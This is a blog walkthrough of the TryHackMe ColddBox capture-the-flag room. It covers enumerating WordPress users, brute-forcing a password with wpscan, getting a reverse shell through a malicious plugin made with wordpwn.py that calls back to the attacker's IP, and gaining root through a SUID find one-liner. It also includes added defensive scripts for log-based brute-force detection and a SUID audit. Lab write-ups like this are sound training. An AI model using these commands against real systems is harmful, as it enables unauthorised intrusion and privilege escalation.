TryHackMe Walkthrough - ColddBox

No beers were found in this room :(

15/01/2021

Back again with another easy box from TryHackMe! You can check the room out here!
tl;dr: enumerate usernames, brute-force passwords, get a reverse shell with a malicious WordPress plugin and escalate privileges using a badly configured SUID binary.

Enumeration

As always, let's start with some enumeration. I ran a few different scans: nmap, nikto, wpscan and dirb. The nmap scan was a basic full-port service scan. It showed us two things.
1. Port 80 is open, so we're working with a web server (hence the other scans)
2. SSH is there, but it's running on a non-standard port (4512)

nmap -p- -sV 10.10.207.52
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 09:27 GMT
Nmap scan report for 10.10.207.52
Host is up (0.044s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Our nikto scan also found a few interesting items!

+ OSVDB-3092: /hidden/: This might be interesting...
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found

Let's start with the "hidden" directory. Visiting it landed us on a page with some interesting text...

U-R-G-E-N-T
C0ldd, you changed Hugo's password, when you can send it to him so he can continue uploading his articles. Philip

Now we know 3 users: C0ldd, Hugo and Philip. Seems like Philip is the boss! We can confirm this with wpscan by sticking the "--enumerate u" flag on the end. I put all these usernames in a file called "users.txt".

[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

We also found a "/wp-login.php" file, which is the standard WordPress login portal. This could be handy if we ever find some passwords for our usernames!

User + Root Flag

So we have some usernames and a login portal. We need passwords! I did some more scanning and fiddling about but didn't find any, so let’s try some good ol' brute force. We can use wpscan to do this job with the command:

wpscan --url http://10.10.207.52 -U users.txt -P /usr/share/wordlists/rockyou.txt

I let that run for a minute or two and boom! We have the password for "c0ldd" (9876543210)! We can use this to log in via "/wp-login.php". Once in, I had a snoop around but didn't find any nice plain-text passwords. Time for the Malicious WordPress Plugin! We can use this to create a reverse shell on the server. Simply follow the instructions on the GitHub page; it's very simple (make sure the IP you use to call back to is the one shown on the TryHackMe website, in the little green box in the top right corner!).
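As an added defensive counterpart to the author-ID enumeration and the wpscan brute force above (example code written for this walkthrough, not from the post or the box): a small Python detector that reads Apache access-log lines and flags a client that sweeps /?author=N or piles up failed POSTs to /wp-login.php, especially when a 302 (a successful login) follows them. The log lines, IP addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache combined-log line: ip ident user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Constructed sample (not captured from the box): 10.0.0.9 sweeps /?author=N, then hammers
# wp-login.php (a failed login re-renders the form with 200; success redirects with 302).
SAMPLE_LOG = [
    f'10.0.0.9 - - [15/Jan/2021:09:40:0{i} +0000] "GET /?author={i} HTTP/1.1" 301 0 "-" "WPScan"'
    for i in range(1, 5)
] + [
    '10.0.0.9 - - [15/Jan/2021:09:41:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "WPScan"'
] * 12 + [
    '10.0.0.9 - - [15/Jan/2021:09:41:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan"',
    '10.0.0.5 - - [15/Jan/2021:09:42:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

def parse(line):
    """Return (ip, method, path, query dict, status), or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    return ip, method, url.path, parse_qs(url.query), int(status)

def detect(lines, login_threshold=10, author_threshold=3):
    failed = defaultdict(int)    # ip -> failed wp-login.php POSTs
    authors = defaultdict(set)   # ip -> distinct author IDs probed
    alerts = defaultdict(set)    # ip -> alert tags
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, method, path, qs, status = rec
        if path == "/wp-login.php" and method == "POST":
            if status == 200:
                failed[ip] += 1
            elif status == 302 and failed[ip] >= login_threshold:
                alerts[ip].add("login_success_after_bruteforce")
        elif path == "/" and "author" in qs:
            authors[ip].update(qs["author"])
    for ip, n in failed.items():
        if n >= login_threshold:
            alerts[ip].add("login_bruteforce")
    for ip, ids in authors.items():
        if len(ids) >= author_threshold:
            alerts[ip].add("author_enum")
    return dict(alerts)
```

On a real server, call detect() with the open access log (detect(open("/var/log/apache2/access.log"))) and alert on any IP it returns; the 302-after-failures tag is the one that means the brute force worked.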

python3 wordpwn.py 10.8.16.218 1234 Y

Once it was created, we upload the plugin .zip file to the wordpress site and visit the page!

http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php

Pop! There's our shell! I decided to drop from meterpreter to a plain shell by running "shell" and then upgrade it to a proper interactive TTY using python3:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now we can explore! I found a "user.txt" file in the home folder of "c0ldd" but didn't have permission to read it! Let's try something else...

I couldn't find anything else. Let's try some privilege escalation! A quick SUID search came up with a few results. After checking them all against GTFOBins, I found a way to abuse find to get root access.

www-data@ColddBox-Easy:/var/www/html/wp-admin$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/bin/su
/bin/ping6
/bin/ping
/bin/fusermount
/bin/umount
/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/find
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

If we run the following command, we can get root access:

find . -exec /bin/sh -p \; -quit

Just like that, we're root! You can check this by running "whoami". Now we can just go grab both the root and the user flag.
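From the blue-team side, the SUID listing above is exactly what a periodic audit should catch. This added Python script (written for this walkthrough, not from the post) walks the filesystem like find -perm /4000, diffs the result against a baseline, and flags binaries that hand out a shell when SUID. The baseline is an assumption built from the box's listing minus /usr/bin/find, which is not SUID on a stock install; a real baseline should come from a known-good host.

```python
import os
import stat

# Assumed baseline for this box: the SUID listing above minus /usr/bin/find, which a stock
# install does not ship SUID. Build the real baseline from a known-good host.
EXPECTED_SUID = {
    "/bin/su", "/bin/ping6", "/bin/ping", "/bin/fusermount", "/bin/umount", "/bin/mount",
    "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/pkexec", "/usr/bin/sudo",
    "/usr/bin/newgidmap", "/usr/bin/newgrp", "/usr/bin/at", "/usr/bin/newuidmap",
    "/usr/bin/chfn", "/usr/bin/passwd", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/snapd/snap-confine", "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}
# Programs that give a shell or arbitrary file access when SUID (a few GTFOBins entries)
SHELL_CAPABLE = {"find", "bash", "sh", "vim", "python3", "perl", "awk", "env", "less", "more"}

def scan_suid(roots=("/bin", "/sbin", "/usr", "/opt", "/home", "/tmp", "/var")):
    """Return the set of regular files under roots with the SUID bit set (like find -perm /4000)."""
    found = set()
    for root in roots:
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)           # lstat: do not follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.add(path)
    return found

def audit(found, expected=EXPECTED_SUID):
    """Split a SUID listing into (unexpected, missing, shell_capable) relative to the baseline."""
    unexpected = found - expected
    missing = expected - found
    shell_capable = {p for p in found if os.path.basename(p) in SHELL_CAPABLE}
    return unexpected, missing, shell_capable

if __name__ == "__main__":
    unexpected, missing, shell_capable = audit(scan_suid())
    for p in sorted(unexpected | shell_capable):
        print(f"review and most likely fix with: chmod u-s {p}")
    for p in sorted(missing):
        print(f"baseline binary lost its SUID bit (tampering?): {p}")
```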

Conclusion

This way of obtaining the flags doesn't seem like the intended method, since we never used SSH and only found the user flag after getting root access. However, it works and is therefore valid!